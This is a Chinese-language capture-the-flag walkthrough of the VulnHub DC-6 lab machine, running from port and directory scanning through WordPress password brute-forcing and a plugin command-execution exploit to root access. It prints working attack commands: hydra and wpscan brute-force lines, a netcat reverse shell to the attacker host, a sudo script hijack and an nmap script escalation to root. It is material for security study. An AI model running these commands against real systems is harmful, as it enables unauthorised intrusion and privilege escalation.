一、介绍
运行环境:Virtualbox
攻击机:kali(10.0.2.15)
靶机:DC6(10.0.2.59)
目标:获取靶机root权限和flag
靶机下载地址:https://www.vulnhub.com/entry/dc-6,315/
二、信息收集
使用nmap主机发现靶机ip:10.0.2.59
使用nmap端口扫描发现靶机开放端口:22、80
nmap -A 10.0.2.59 -p 1-65535
打开网站发现会自动跳转到域名wordy,在/etc/hosts文件添加一条数据并保存:
10.0.2.59 wordy再次访问网站,成功访问,该网站是wordpress框架搭建的
使用gobuster和dirsearch工具爆破目录
gobuster dir -u http://wordy/ -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
dirsearch -u http://wordy/ 
三、漏洞利用
使用wpscan工具扫描一下,枚举用户名,发现五个用户名:admin、graham、mark、sarah、jens
wpscan --url http://wordy/ --enumerate u,p,t --plugins-detection aggressive --detection-mode aggressive
可以尝试使用wpscan工具对网站进行暴力破解和使用hydra工具对ssh进行暴力破解:
wpscan --url http://wordy/ -P /usr/share/wordlists/rockyou.txt -U user1.txt
hydra -L user1.txt -P /usr/share/wordlists/rockyou.txt ssh://10.0.2.59:22 -t 64 
爆破了很久,wpscan爆破得到:mark:helpdesk01
登录网站,发现网站使用插件:activity monitor
使用searchsploit搜索该插件的历史漏洞,发现命令执行漏洞
searchsploit wordpress activity monitor
将命令执行漏洞的exp下载下来,运行
使用nc命令反弹shell
nc -e /bin/bash 10.0.2.15 4444
获取交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
四、提权
运行命令sudo -l查看一下具有sudo权限的程序,需要输入密码;运行命令find / -perm -u=s -type f 2>/dev/null查看一下具有SUID权限的二进制可执行文件,未发现可利用的。
翻一翻靶机各个文件发现文件/home/mark/stuff/things-to-do.txt、/home/jens/backups.sh
查看这两个文件发现一组用户名密码:graham:GSo7isUM1D4
切换为graham用户
运行命令sudo -l查看一下具有sudo权限的程序,发现可以无密码以jens用户权限运行/home/jens/backups.sh文件
查看backups.sh文件发现我们具有修改权限
将提权命令写入backups.sh文件
echo '/bin/bash' >> backups.sh
以jens用户权限运行backups.sh文件
sudo -u jens /home/jens/backups.sh
运行命令sudo -l查看一下具有sudo权限的程序,发现可以以root权限无密码运行nmap命令
使用nmap命令进行提权
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
获取flag
